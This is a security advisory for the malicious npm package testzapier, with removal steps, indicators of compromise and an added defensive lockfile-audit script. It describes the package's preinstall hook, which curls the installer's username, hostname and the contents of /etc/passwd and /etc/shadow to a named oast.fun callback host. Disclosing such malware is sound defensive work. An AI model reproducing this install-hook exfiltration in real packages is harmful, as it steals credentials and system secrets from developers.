Malicious package

testzapier (npm)

Malicious code in testzapier (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5575
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall testzapier

What this malware does

package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.

Malicious versions

2 flagged
1.0.0, 1.0.1
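
The following added example, which is not part of the advisory or of the package, checks a parsed package-lock.json for the flagged testzapier versions and lists every dependency that declares an install-time script, the mechanism described above. The function names and the sample lockfile are constructed for illustration.

```javascript
// Package name and versions flagged in the advisory.
const FLAGGED = { name: "testzapier", versions: ["1.0.0", "1.0.1"] };

// Constructed sample lockfile (v3 layout); the other package names are hypothetical.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.1.0" },
    "node_modules/example-util": { version: "2.4.0" },
    "node_modules/example-native-addon": { version: "3.1.2", hasInstallScript: true },
    "node_modules/example-lib/node_modules/testzapier": { version: "1.0.1", hasInstallScript: true },
  },
};

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function nameFromPath(path) {
  const marker = "node_modules/";
  const i = path.lastIndexOf(marker);
  return i === -1 ? path : path.slice(i + marker.length);
}

// Returns { flagged, installScripts } for a parsed package-lock.json.
function auditLockfile(lock) {
  const findings = { flagged: [], installScripts: [] };
  const record = (name, version, where, hasScript) => {
    if (name === FLAGGED.name && FLAGGED.versions.includes(version)) {
      findings.flagged.push({ name, version, where });
    }
    if (hasScript) findings.installScripts.push({ name, version, where });
  };
  if (lock.packages) {
    // v2/v3: flat map keyed by install path; "" is the root project.
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === "") continue;
      record(entry.name || nameFromPath(path), entry.version, path, entry.hasInstallScript === true);
    }
  } else {
    // v1: nested "dependencies" tree; it does not record install scripts.
    const walk = (deps, trail) => {
      for (const [name, entry] of Object.entries(deps || {})) {
        record(name, entry.version, trail.concat(name).join(" > "), false);
        walk(entry.dependencies, trail.concat(name));
      }
    };
    walk(lock.dependencies, []);
  }
  return findings;
}
```

To audit a real project, pass the result of `JSON.parse` on its package-lock.json to `auditLockfile`. Installing with `npm ci --ignore-scripts` keeps lifecycle hooks such as preinstall from running while the tree is being reviewed.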

Indicators of compromise (SHA-256)

045f2a9515d6ea6e0d97f528486c1ed7ffb6626ae018c414b5842ba2db15fac1
a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f

Frequently asked questions

No. testzapier on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005461, IN-MAL-2026-005460

Credits

  • Amazon Inspector · finder

testzapier (npm) malicious package — MAL-2026-5575 | O3 Security